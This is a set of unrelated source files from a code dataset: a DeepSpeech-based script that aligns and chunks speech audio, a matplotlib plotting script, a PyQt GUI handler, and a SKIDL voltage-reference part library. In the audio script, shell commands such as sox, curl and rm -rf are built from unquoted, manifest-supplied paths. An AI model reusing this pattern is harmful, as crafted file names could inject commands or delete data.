        os.system('sox ' + wavfile + ' ' + wavechunkout + ' channels 1 rate 16000')
        #manifestfile.write(wavechunkout + "," + options.output + "/" + basename + "_" + str(chunknum) + ".txt\n")
        return
    newstrs = strs
    newtexts = characters
    #manifestfile = open(options.omanifest, "w")
    chunknum = 1
    chunktext = ""  # NOTE(review): never used below
    nextchunkstart = 0
    currlength = 0
    for i in range(1, len(newstrs)):
        segmentlength = newstrs[i] - newstrs[i-1]
        currlength = newstrs[i]
        # Split once the running chunk reaches *size* seconds AND we are at
        # a word boundary (space char) preceded by a >0.5 s silent gap.
        if currlength - newstrs[nextchunkstart] >= size and segmentlength > 0.5 and characters[i-1] == " ": # > a silent pause included
            # move back 100 ms from the start of the next word
            splitpoint = newstrs[i] - 0.1
            splitpointix = i # excluding i
            #print(str(strs[i-1]) +" "+ str(strs[i]) +" "+ characters[i-1]+" "+ characters[i]+" "+ characters[i+1]+" "+ characters[i+2])
            # write out to file
            wavechunkout = options.output+"/"+basename+"_"+str(chunknum)+".wav"
            txtchunkout = open(options.output + "/" + basename + "_" + str(chunknum) + ".txt","w")
            txtchunkout.write(''.join(newtexts[nextchunkstart:splitpointix-1]))
            txtchunkout.close()
            audiochunklen = newstrs[splitpointix] - newstrs[nextchunkstart] - 0.1
            #print(basename+ " "+str(newstrs[i]) + " " + str(newstps[i]) + " " + str(length) + " " +str(chunknum))
            os.system('sox ' + wavfile + ' ' + wavechunkout + ' channels 1 rate 16000 trim ' + str(newstrs[nextchunkstart]) + ' ' + str(audiochunklen))
            #manifestfile.write(wavechunkout + "," + options.output + "/" + basename + "_" + str(chunknum) + ".txt\n")
            chunknum = chunknum+1
            nextchunkstart = i
            currlength = 0
    # last chunk: everything from the final split point to the end of file
    # write out to file
    wavechunkout = options.output + "/" + basename + "_" + str(chunknum) + ".wav"
    txtchunkout = open(options.output + "/" + basename + "_" + str(chunknum) + ".txt", "w")
    txtchunkout.write(''.join(newtexts[nextchunkstart:len(newstrs)]))
    txtchunkout.close()
    # print(basename+ " "+str(newstrs[i]) + " " + str(newstps[i]) + " " + str(length) + " " +str(chunknum))
    os.system('sox ' + wavfile + ' ' + wavechunkout + ' channels 1 rate 16000 trim ' + str(newstrs[nextchunkstart]))
    #manifestfile.write(wavechunkout + "," + options.output + "/" + basename + "_" + str(chunknum) + ".txt\n")
    #manifestfile.close()
def align(wav, txt, wdir, basename, lm=None):
    """Transcribe *wav* with the DeepSpeech HTTP server and return
    [offsets_in_seconds, characters, path_to_16kHz_wav].

    If *lm* is None, a per-file KenLM binary is built from the normalized
    transcript *txt*; otherwise *lm* is used as-is.
    NOTE(review): langmod is not passed to the curl request below — the
    recognition server is assumed to already run with the right LM.
    """
    transcript_arr = None
    offsets_arr = None
    langmod = None
    if lm == None:
        # normalize text
        txtin = open(txt,"r")
        txtout = open(wdir+"/"+basename+".txt","w")
        text = txtin.readline()
        nrmtxt = norm(text)
        txtout.write(nrmtxt+"\n")
        txtout.close()
        # build KenLM (old hard-coded paths kept below for reference)
        #os.system("/home/pakh0002/kenlm/build/bin/lmplz -o 6 --discount_fallback --text " + wdir + "/" + basename + ".txt " + "--arpa "+ wdir + "/" + basename + ".arpa")
        #os.system("/home/pakh0002/kenlm/build/bin/build_binary "+ wdir + "/" + basename + ".arpa " + wdir + "/" + basename + ".binary")
        os.system("/workspace/kenlm/build/bin/lmplz -o 6 --discount_fallback --text " + wdir + "/" + basename + ".txt " + "--arpa " + wdir + "/" + basename + ".arpa")
        os.system("/workspace/kenlm/build/bin/build_binary "+ wdir + "/" + basename + ".arpa " + wdir + "/" + basename + ".binary")
        langmod = wdir + "/" + basename + ".binary"
    else:
        langmod = lm
    # convert audio to 16 kHz mono for the recognizer
    os.system("sox "+wav+" -r 16000 -c 1 "+wdir + "/" + basename + "_16.wav" )
    # run recognizer
    print("Recognizing WAV... "+wav)
    inwav = wdir + "/" + basename + "_16.wav"
    outjson = wdir + "/" + basename + ".json"
    os.system("curl -X POST http://0.0.0.0:8888/transcribe -H \"Content-type: multipart/form-data\" -F \"file=@"+wav+"\" > "+outjson)
    #os.system("python ./transcribe.py --audio-path " +
    #          wdir + "/" + basename + "_16.wav --model-path /home/pakh0002/deepspeech.pytorch/expmodels/deepspeech_100g_cv.pth.tar --lm-path " +
    #          langmod + " --decoder beam --alpha 0.9 --cuda --offsets > " + wdir + "/" + basename + ".json");
    # read JSON produced by the server
    with open(wdir + "/" + basename + ".json") as f:
        asr_data = json.load(f)
    transcript = asr_data["output"][0]["transcription"]
    offsets_arr = asr_data["output"][0]["offsets"]
    # take care of cases where the transcription is blank and no offsets
    if transcript == "":
        transcript = "\'"
        offsets_arr.append(0)
    transcript_arr = list(transcript)
    assert len(offsets_arr) == len(transcript_arr), "Numbers of characters and offsets in output do not match"
    # multiply the offsets by a scalar (duration of file in seconds / size of output) to get the offsets in seconds
    dur = file_info.duration(wdir + "/" + basename + "_16.wav")
    #coeff = float(dur) / 16000.0
    # 0.02 s per model frame — assumption baked into the acoustic model; confirm
    offsets_arr_secs = [round(i * 0.02,2) for i in offsets_arr]
    #print(len(offsets_arr))
    #print(len(transcript_arr))
    print("Result: " + transcript)
    return [offsets_arr_secs,transcript_arr,wdir + "/" + basename + "_16.wav"]
if __name__ == '__main__':
    # CLI: read a manifest of "wavpath,transcriptpath" lines; for each pair,
    # build a per-file KenLM, start the ASR server with it, align, and write
    # ~chunksize-second wav/txt chunks into --output.
    parser = argparse.ArgumentParser()
    parser.add_argument('--imanifest', help='Input manifest', default='./')
    parser.add_argument('--output', help='Output dir', default='./')
    parser.add_argument('--omanifest', help='Output manifest', default = './out.txt')
    parser.add_argument('--chunksize', help='Size of audio segments (seconds)', default=8.0)
    parser.add_argument('--wdir', help='Working directory', default='./')
    args = parser.parse_args()
    inmani = open(args.imanifest,"r")
    for line in inmani.readlines():
        line = re.sub(r'\s+','',line)
        wavefile,transcript = line.split(",")
        if wavefile.endswith(".wav"):
            basename = os.path.basename(wavefile)
            dirname = os.path.dirname(wavefile)
            basename = re.sub(r'\.wav', '', basename)
            if os.path.isfile(wavefile) and os.path.isfile(transcript):
                if file_info.duration(wavefile) > 20:
                    # Long file: split on silences first. Retry with
                    # progressively higher silence thresholds (0.3% -> 2% -> 5%)
                    # until at least 3 parts are produced.
                    # split the long wavefile
                    os.system("sox -V3 "+wavefile+" "+dirname+"/"+basename+"_part_.wav silence -l 0 1 2.0 0.3\% : newfile : restart")
                    partcnt = 0
                    for part in os.listdir(dirname):
                        if "_part_" in part:
                            partcnt = partcnt + 1
                    if partcnt < 3:
                        os.system("rm -rf "+dirname+"/*_part_*")
                        # decrease silence dur to 1 second
                        os.system("sox -V3 " + wavefile + " " + dirname + "/" + basename + "_part_.wav silence -l 0 1 2.0 2\% : newfile : restart")
                    partcnt = 0
                    for part in os.listdir(dirname):
                        if "_part_" in part:
                            partcnt = partcnt + 1
                    if partcnt < 3:
                        os.system("rm -rf " + dirname + "/*_part_*")
                        # decrease silence dur to 1 second
                        os.system(
                            "sox -V3 " + wavefile + " " + dirname + "/" + basename + "_part_.wav silence -l 0 1 2.0 5\% : newfile : restart")
                    combined_wavs = {}
                    # build an LM
                    # normalize text
                    txtin = open(transcript, "r")
                    txtout = open(args.wdir + "/" + basename + ".txt", "w")
                    text = txtin.readline()
                    nrmtxt = norm(text)
                    txtout.write(nrmtxt + "\n")
                    txtout.close()
                    # build KenLM
                    os.system("/workspace/kenlm/build/bin/lmplz -o 6 --discount_fallback --text " + args.wdir + "/" + basename + ".txt " + "--arpa " + args.wdir + "/" + basename + ".arpa")
                    os.system("/workspace/kenlm/build/bin/build_binary " + args.wdir + "/" + basename + ".arpa " + args.wdir + "/" + basename + ".binary")
                    lmname = args.wdir + "/" + basename + ".binary"
                    # start the ASR server with this file's LM; give it 20 s to boot
                    subproc = subprocess.Popen(['exec python server.py --model-path /home/pakh0002/deepspeech.pytorch/expmodels/deepspeech_100g_cv.pth.tar --lm-path ' + args.wdir + '/' + basename + '.binary --decoder beam --alpha 0.9 --cuda'], shell=True)
                    time.sleep(20)
                    pid = subproc.pid
                    print("Started ASR server process: "+str(pid))
                    #inwav = '/media/pakh0002/AUDIO_DATA_SSD/SWC_English/english/2006_Atlantic_hurricane_season/chunks/audio_part_001_1.wav'
                    #os.system("curl -X POST http://0.0.0.0:8888/transcribe -H \"Content-type: multipart/form-data\" -F \"file=@"+inwav+"\"")
                    # align and chunk each silence-split part
                    for subname in os.listdir(dirname):
                        if "_part_" in subname:
                            partbasename = subname
                            partbasename = re.sub(r'\.wav','',partbasename)
                            starts, transcrs, wav = align(dirname+"/"+subname, transcript, args.wdir, partbasename, lmname)
                            chunk_it(wav, starts, transcrs, args, partbasename, float(args.chunksize))
                            #combined_wavs[wav] = [starts, transcrs]
                    #for wav in combined_wavs:
                    #print("WAVE to chunk: "+wav)
                    #chunk_it(wav, combined_wavs[wav][0], combined_wavs[wav][1], args, partbasename, float(args.chunksize))
                    #os.killpg(os.getpgid(pid), signal.SIGTERM)
                    subproc.kill()
                    print("Ended ASR server process: " + str(pid))
                else:
                    # Short file: build the LM, start the server, align whole file.
                    # build an LM
                    # normalize text
                    txtin = open(transcript, "r")
                    txtout = open(args.wdir + "/" + basename + ".txt", "w")
                    text = txtin.readline()
                    nrmtxt = norm(text)
                    txtout.write(nrmtxt + "\n")
                    txtout.close()
                    # build KenLM
                    os.system("/workspace/kenlm/build/bin/lmplz -o 6 --discount_fallback --text " + args.wdir + "/" + basename + ".txt " + "--arpa " + args.wdir + "/" + basename + ".arpa")
                    os.system("/workspace/kenlm/build/bin/build_binary " + args.wdir + "/" + basename + ".arpa " + args.wdir + "/" + basename + ".binary")
                    lmname = args.wdir + "/" + basename + ".binary"
                    # start the server
                    subproc = subprocess.Popen(['exec python server.py --model-path /home/pakh0002/deepspeech.pytorch/expmodels/deepspeech_100g_cv.pth.tar --lm-path ' + args.wdir + '/' + basename + '.binary --decoder beam --alpha 0.9 --cuda'],shell=True)
                    time.sleep(20)
                    pid = subproc.pid
                    print("Started ASR server process: " + str(pid))
                    starts, transcrs, wav = align(wavefile, transcript, args.wdir, basename, lmname)
                    chunk_it(wav, starts, transcrs, args, basename, float(args.chunksize))
                    subproc.kill()
                    print("Ended ASR server process: " + str(pid))
            continue
        else:
            continue
| StarcoderdataPython |
6546459 | # -*- coding: utf-8 -*-
"""
@author: <NAME>
"""
# Importations of the main packages and functions:
import numpy as np
import matplotlib.pyplot as plt
from functions import final_function, alpha_abrupt
# %%
# Representation of the variation of the interaction strength through time.
x = np.linspace(0, 59.9, 100)
N = 10  # NOTE(review): unused in this cell; presumably ties to the log(10) in the threshold — confirm
y_a = np.ones(100)
# Evaluate the abrupt interaction-strength profile at each time point.
for i, value in enumerate(x):
    y_a[i] = alpha_abrupt(value)
fig = plt.figure(1, figsize=(10, 6))
plt.plot(x, y_a, color='k')
# Feasibility threshold drawn at sqrt(2*log(10)).
plt.axhline(np.sqrt(2*np.log(10)), color='black',
            linestyle='--', label='Feasibility threshold')
plt.ylim(0, 3.5)
axes = plt.gca()
axes.yaxis.set_ticks([0, 0.5, 1, 1.5, 2, np.sqrt(2*np.log(10)), 2.5, 3, 3.5])
axes.yaxis.set_ticklabels(('0', '0.5', '1', '1.5', '2',
                           r'$\sqrt{2log(10)}$', '2.5', '3', '3.5'), color='black', fontsize=10)
plt.xlabel("Time (t)", fontsize=15)
plt.ylabel(r"Variation of the interaction strength $\alpha(t)$", fontsize=15)
plt.legend(loc='upper right')
plt.show()
# %%
# Representation of the proportion of surviving species through time.
x = np.linspace(0, 59.9, 100)
N = 10  # NOTE(review): unused in this cell — confirm whether final_function depends on it elsewhere
p_a = np.ones(100)
y_a = np.ones(100)  # NOTE(review): unused in this cell
MU = 0
# Proportion of surviving species is the first element returned by final_function.
for i, value in enumerate(x):
    p_a[i] = final_function(alpha_abrupt(value), MU)[0]
fig = plt.figure(1, figsize=(10, 6))
plt.plot(x, p_a, color='k', linestyle='--')
plt.ylim(0, 1.1)
plt.xlabel("Time (t)", fontsize=15)
plt.ylabel(r"Variation of the proportion of surviving species $p(t)$", fontsize=15)
plt.show()
| StarcoderdataPython |
5057334 | <filename>ibeatles/step2/gui_handler.py
try:
import PyQt4
import PyQt4.QtCore as QtCore
import PyQt4.QtGui as QtGui
except:
import PyQt5
import PyQt5.QtCore as QtCore
import PyQt5.QtGui as QtGui
import numpy as np
import pyqtgraph as pg
from pyqtgraph.dockarea import *
from ibeatles.utilities.colors import pen_color
from ibeatles.step2.plot import Step2Plot
from ibeatles.step2.normalization import Normalization
class CustomAxis(pg.AxisItem):
    """Axis whose tick labels show the reciprocal (1/value) of each tick."""

    def tickStrings(self, values, scale, spacing):
        # Guard zero per element instead of the previous in-place
        # ``values[values == 0] = np.NaN``: that mutated the caller's array,
        # and when ``values`` is a plain list the expression ``values == 0``
        # evaluates to False (i.e. index 0), silently clobbering values[0].
        # A zero tick still renders as 'nan', matching 1/NaN formatting.
        return ['{:.4f}'.format(1. / v) if v != 0 else 'nan' for v in values]
class Step2GuiHandler(object):
    """Builds and maintains the 'Step 2' (normalization) tab of the GUI.

    Holds a reference to the main window (*parent*) and wires up the
    pyqtgraph docks, the ROI, the Bragg-edge plot and the x-axis buttons.
    (The dataset-separator residue fused onto the final line of the
    original source has been removed.)
    """

    # Column widths (px) for the normalization ROI table.
    col_width = [70, 50, 50, 50, 50]

    def __init__(self, parent=None):
        self.parent = parent

    def update_widgets(self):
        """Refresh the sample image, run normalization and re-init the ROI table."""
        o_step2_plot = Step2Plot(parent = self.parent)
        o_step2_plot.display_image()
        #o_step2_plot.display_counts_vs_file()
        o_normalization = Normalization(parent=self.parent)
        o_normalization.run()
        o_step2_plot.init_roi_table()
        self.check_run_normalization_button()

    def init_table(self):
        """Apply the fixed column widths to the normalization table."""
        for _index, _width in enumerate(self.col_width):
            self.parent.ui.normalization_tableWidget.setColumnWidth(_index, _width)

    def init_pyqtgraph(self):
        """Create the dock area, image view + ROI, Bragg-edge plot and the
        file-index/TOF/lambda x-axis radio buttons, and register the widgets
        on the parent for later access."""
        area = DockArea()
        area.setVisible(False)
        d1 = Dock("Sample", size=(200, 300))
        d2 = Dock("STEP1: Background normalization", size=(200, 100))
        #d3 = Dock("STEP2: Working Range Selection", size=(200, 100))
        area.addDock(d1, 'top')
        #area.addDock(d3, 'bottom')
        area.addDock(d2, 'bottom')
        #area.moveDock(d2, 'above', d3)
        preview_widget = pg.GraphicsLayoutWidget()
        pg.setConfigOptions(antialias=True)
        vertical_layout = QtGui.QVBoxLayout()
        #preview_widget.setLayout(vertical_layout)
        # image view with a resizable ROI overlaid
        image_view = pg.ImageView()
        image_view.ui.roiBtn.hide()
        image_view.ui.menuBtn.hide()
        roi = pg.ROI([0,0],[20,20], pen=pen_color['0'])
        roi.addScaleHandle([1,1],[0,0])
        image_view.addItem(roi)
        roi.sigRegionChangeFinished.connect(self.parent.normalization_manual_roi_changed)
        #vertical_layout.addWidget(image_view)
        #top_right_widget = QtGui.QWidget()
        d1.addWidget(image_view)
        # bragg edge plot with a reciprocal-scale axis on top (CustomAxis)
        bragg_edge_plot = pg.PlotWidget()
        bragg_edge_plot.plot()
        # bragg_edge_plot.setLabel("top", "")
        p1 = bragg_edge_plot.plotItem
        p1.layout.removeItem(p1.getAxis('top'))
        caxis = CustomAxis(orientation='top', parent=p1)
        caxis.setLabel('')
        caxis.linkToView(p1.vb)
        p1.layout.addItem(caxis, 1, 1)
        #add file_index, TOF, Lambda x-axis buttons
        hori_layout = QtGui.QHBoxLayout()
        button_widgets = QtGui.QWidget()
        button_widgets.setLayout(hori_layout)
        #file index
        file_index_button = QtGui.QRadioButton()
        file_index_button.setText("File Index")
        file_index_button.setChecked(True)
        self.parent.connect(file_index_button, QtCore.SIGNAL("clicked()"),
                            self.parent.step2_file_index_radio_button_clicked)
        #tof
        tof_button = QtGui.QRadioButton()
        tof_button.setText("TOF")
        self.parent.connect(tof_button, QtCore.SIGNAL("clicked()"),
                            self.parent.step2_tof_radio_button_clicked)
        #lambda
        lambda_button = QtGui.QRadioButton()
        lambda_button.setText(u"\u03BB")
        self.parent.connect(lambda_button, QtCore.SIGNAL("clicked()"),
                            self.parent.step2_lambda_radio_button_clicked)
        spacer = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        hori_layout.addItem(spacer)
        hori_layout.addWidget(file_index_button)
        hori_layout.addWidget(tof_button)
        hori_layout.addWidget(lambda_button)
        hori_layout.addItem(spacer)
        d2.addWidget(bragg_edge_plot)
        d2.addWidget(button_widgets)
        vertical_layout.addWidget(area)
        self.parent.ui.normalization_left_widget.setLayout(vertical_layout)
        # expose the widgets on the parent so other handlers can use them
        self.parent.step2_ui['area'] = area
        self.parent.step2_ui['image_view'] = image_view
        self.parent.list_roi_id['normalization'] = [roi]
        self.parent.step2_ui['bragg_edge_plot'] = bragg_edge_plot
        #self.parent.step2_ui['normalized_profile_plot'] = normalized_profile_plot
        self.parent.step2_ui['caxis'] = caxis
        self.parent.step2_ui['xaxis_file_index'] = file_index_button
        self.parent.step2_ui['xaxis_lambda'] = lambda_button
        self.parent.step2_ui['xaxis_tof'] = tof_button
        self.parent.xaxis_button_ui['normalization']['tof'] = tof_button
        self.parent.xaxis_button_ui['normalization']['file_index'] = file_index_button
        self.parent.xaxis_button_ui['normalization']['lambda'] = lambda_button

    def check_add_remove_roi_buttons(self):
        """Enable the 'remove ROI' button only when the table has rows."""
        nbr_row = self.parent.ui.normalization_tableWidget.rowCount()
        if nbr_row == 0:
            _status_remove = False
        else:
            _status_remove = True
        self.parent.ui.normalization_remove_roi_button.setEnabled(_status_remove)

    def check_run_normalization_button(self):
        """Enable 'run normalization' only when sample data is loaded and
        either an ROI row or an open-beam data set exists."""
        nbr_row = self.parent.ui.normalization_tableWidget.rowCount()
        ob = self.parent.data_files['ob']
        data = self.parent.data_files['sample']
        if data == []:
            _status = False
        else:
            if (nbr_row == 0) and (ob == []):
                _status = False
            else:
                _status = True
        self.parent.ui.normalization_button.setEnabled(_status)

    def enable_xaxis_button(self, tof_flag=True):
        """Enable all three x-axis radio buttons, or — when TOF data is
        unavailable — disable TOF/lambda and force file-index."""
        list_ui = [self.parent.step2_ui['xaxis_file_index'],
                   self.parent.step2_ui['xaxis_lambda'],
                   self.parent.step2_ui['xaxis_tof']]
        if tof_flag:
            for _ui in list_ui:
                _ui.setEnabled(True)
        else:
            list_ui[1].setEnabled(False)
            list_ui[2].setEnabled(False)
            list_ui[0].setChecked(True)
3482021 | <reponame>arjenroodselaar/skidl
from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
# Auto-generated SKIDL part library: voltage references, shunt regulators,
# and adjustable current sources (converted from a KiCad symbol library).
# This is data, not logic -- it is normally regenerated by a tool rather
# than edited by hand.
SKIDL_lib_version = '0.0.1'

references = SchLib(tool=SKIDL).add_parts(*[
    Part(name='CJ432',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23',ref_prefix='D',num_units=1,fplist=['SOT*23*'],do_erc=True,pins=[
        Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='ISL21070DIH306Z-TK',dest=TEMPLATE,tool=SKIDL,keywords='Micropower Voltage Reference 0.6V',description='ISL201070 Series, 0.6V 25μA Micropower Voltage Reference, SOT-23',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['ISL21070CIH320Z-TK', 'ISL21070CIH325Z-TK'],pins=[
        Pin(num='1',name='Vin',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='Vout',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True)]),
    Part(name='LM134H/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Adjustable Current Source 10mA',description='LM134H, 1μA to 10mA 3-Terminal Adjustable Current Source, TO-46',ref_prefix='U',num_units=1,fplist=['TO?46*'],do_erc=True,pins=[
        Pin(num='1',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='~',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM285D-1.2',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='2.500V Micropower Voltage Reference Diodes, SO-8',ref_prefix='D',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['LM285D-2.5', 'LM385D-1.2', 'LM385D-2.5'],pins=[
        Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='4',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='6',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='8',name='K',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM285M-ADJ',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='Adjustable Micropower Voltage Reference Diodes, SO-8',ref_prefix='D',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['LM385M-ADJ'],pins=[
        Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='4',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='5',name='FB',do_erc=True),
        Pin(num='6',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='8',name='K',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM285S-1.2',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='2.500V Micropower Voltage Reference Diodes, SO-8',ref_prefix='D',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['LM385S-1.2', 'LM285S-2.5', 'LM385S-2.5'],pins=[
        Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='4',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='6',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='8',name='K',func=Pin.PASSIVE,do_erc=True)]),
    # NOTE(review): alias 'LM358Z-2.5' below looks like a typo for 'LM385Z-2.5'
    # (LM358 is an op-amp family) -- verify against the source symbol library.
    Part(name='LM285Z-2.5',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='1.235V Micropower Voltage Reference Diodes, TO-92',ref_prefix='D',num_units=1,fplist=['TO?92*'],do_erc=True,aliases=['LM285Z-1.2', 'LM385Z-1.2', 'LM358Z-2.5', 'LM385BZ-2.5', 'LM385BZ-1.2'],pins=[
        Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM285Z-ADJ',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference',description='Adjustable Micropower Voltage Reference Diodes, TO-92',ref_prefix='D',num_units=1,fplist=['TO?92*'],do_erc=True,aliases=['LM385Z-ADJ'],pins=[
        Pin(num='1',name='FB',do_erc=True),
        Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM334M/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Adjustable Current Source 10mA',description='LM334M, 1μA to 10mA 3-Terminal Adjustable Current Source, SO-8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,pins=[
        Pin(num='1',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='6',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='7',name='~',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM334SM/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Adjustable Current Source 10mA',description='LM334SM, 1μA to 10mA 3-Terminal Adjustable Current Source, SO-8 Alternate',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,pins=[
        Pin(num='1',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='~',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM334Z/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Adjustable Current Source 10mA',description='LM334Z, 1μA to 10mA 3-Terminal Adjustable Current Source, TO-92',ref_prefix='U',num_units=1,fplist=['TO?92*'],do_erc=True,aliases=['LM334Z/LFT1', 'LM234Z-3/NOPB', 'LM234Z-6/NOPB'],pins=[
        Pin(num='1',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='~',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='~',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM4030-4.096',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference shunt',description='4.096V Ultra-High Precision Shunt Voltage Reference, SOT-23-5',ref_prefix='D',num_units=1,fplist=['SOT?23*'],do_erc=True,aliases=['LM4030-2.5'],pins=[
        Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='NC_GND',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='4',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='5',name='A',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM4040DBZ-2.0',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference shunt',description='8.192V Precision Micropower Shunt Voltage Reference, SOT-23',ref_prefix='D',num_units=1,fplist=['SOT?*23'],do_erc=True,aliases=['LM4040DBZ-2.5', 'LM4040DBZ-3', 'LM4040DBZ-4.1', 'LM4040DBZ-5', 'LM4040DBZ-8.2', 'LM4040DBZ-10'],pins=[
        Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True)]),
    Part(name='LM4040DCK-2.0',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference shunt',description='8.192V Precision Micropower Shunt Voltage Reference, SC-70',ref_prefix='D',num_units=1,fplist=['SC?70*'],do_erc=True,aliases=['LM4040DCK-2.5', 'LM4040DCK-3', 'LM4040DCK-4.1', 'LM4040DCK-5', 'LM4040DCK-8.2', 'LM4040DCK-10'],pins=[
        Pin(num='1',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True)]),
    Part(name='LM4040LP-2.0',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference shunt',description='8.192V Precision Micropower Shunt Voltage Reference, TO-92',ref_prefix='D',num_units=1,fplist=['TO?92*'],do_erc=True,aliases=['LM4040LP-2.5', 'LM4040LP-3', 'LM4040LP-4.1', 'LM4040LP-5', 'LM4040LP-8.2', 'LM4040LP-10'],pins=[
        Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='LM4125AIM5-2.5/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Precision Micropower Low Dropout Voltage Reference 2.5V',description='LM4125-2.5, 2.5V ±0.5% Precision Micropower Low Dropout Voltage Reference, SOT-23-5',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['LM4125IM5-2.0/NOPB', 'LM4125IM5-2.5/NOPB'],pins=[
        Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='GND',func=Pin.PWRIN,do_erc=True),
        Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='4',name='Vin',func=Pin.PASSIVE,do_erc=True),
        Pin(num='5',name='Vout',func=Pin.PASSIVE,do_erc=True)]),
